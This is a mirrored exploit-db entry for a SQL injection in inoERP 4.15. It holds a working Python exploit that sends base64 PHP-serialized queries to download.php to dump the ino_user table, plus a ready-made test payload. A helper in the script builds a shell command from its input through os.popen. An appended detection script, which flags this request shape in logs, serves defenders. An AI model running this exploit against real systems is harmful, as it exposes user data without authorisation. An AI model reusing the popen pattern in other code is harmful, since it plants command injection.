inoERP 4.15 – ‘download’ SQL Injection

  • Author: Semen Alexandrovich Lyhin
    Date: 2019-09-26
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47426/
  • # Exploit Title: inoERP 4.15 - 'download' SQL Injection
    # Date: 2019-09-13
    # Exploit Author: Semen Alexandrovich Lyhin
    # Vendor Homepage: http://inoideas.org/
    # Version: 4.15
    # CVE: N/A
    
    # A malicious query can be sent in base64 encoding to the unserialize() function.
    # It is then deserialized without any sanitization.
    # After that, it gets passed directly to the SQL query.
    
    
    #!/bin/python
    
    import os
    import base64
    import requests
    import sys
    
    def generatePayload(query):
        # THIS FUNCTION IS INSECURE BY DESIGN
        # Shells out to php so that serialize() produces the exact format unserialize() expects,
        # then base64-encodes the result for the 'data' parameter.
        b64_query = base64.b64encode(query)
        return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read()
    
    
    def ExecSQL(query):
        # The serialized payload is sent in 'data', with 'data_type' set to sql_query.
        data = {"data": query,
                "data_type": "sql_query"}
    
        r = requests.post("http://" + ip + "/download.php", data=data)
        return r.content
    
    
    if __name__ == "__main__":
    
        if len(sys.argv) != 3:
            print '(+) usage: %s <target> <path>' % sys.argv[0]
            print '(+) eg: %s 127.0.0.1 "ierp/"' % sys.argv[0]
            exit()
    
        ip = sys.argv[1] + "/" + sys.argv[2]
    
        # If you don't have php, set the payload to the following one to check this SQLi
        # via the "select @@version;" query: czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw==
    
        data = r"select * from ino_user;"
    
        print ExecSQL(generatePayload(data))
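A defender-side complement, added here and not part of the advisory or of inoERP: the request shape above (a base64-encoded PHP serialized string in `data`, with `data_type=sql_query`) is distinctive enough to check for in logged POST bodies. The code below decodes the `data` parameter, verifies that it is a well-formed PHP `s:<len>:"...";` string, and flags it when the inner text starts with a SQL verb; the sample request bodies are constructed, except the first payload, which is the one quoted in the advisory.

```python
import base64
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies to download.php (not captured from a real host).
SAMPLE_REQUESTS = [
    # Payload quoted in the advisory: base64(serialize("select @@version;"))
    "data=czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw%3D%3D&data_type=sql_query",
    # Same serialized-string format, a different data_type (constructed)
    "data=czo1OiJoZWxsbyI7&data_type=report",
    # sql_query code path, but the inner string is not SQL (constructed)
    "data=czo1OiJoZWxsbyI7&data_type=sql_query",
]

# PHP serialize() output for a string: s:<byte length>:"<bytes>";
SERIALIZED_STR = re.compile(rb'^s:(\d+):"(.*)";$', re.DOTALL)
SQL_VERB = re.compile(r'^\s*(select|insert|update|delete|drop|union)\b', re.IGNORECASE)


def decode_serialized_string(b64):
    """Return the text inside a base64-encoded PHP serialized string, or None.

    None means the parameter is not base64, not a serialized string, or the
    declared length does not match the content (so unserialize() would reject it).
    """
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    m = SERIALIZED_STR.match(raw)
    if not m or int(m.group(1)) != len(m.group(2)):
        return None
    return m.group(2).decode("latin-1")


def inspect_request(body):
    """Classify one URL-encoded POST body; 'suspicious' marks the advisory's request shape."""
    params = parse_qs(body)
    data_type = params.get("data_type", [""])[0]
    payload = decode_serialized_string(params.get("data", [""])[0])
    suspicious = (data_type == "sql_query" and payload is not None
                  and bool(SQL_VERB.match(payload)))
    return {"data_type": data_type, "payload": payload, "suspicious": suspicious}


if __name__ == "__main__":
    for body in SAMPLE_REQUESTS:
        print(inspect_request(body))
```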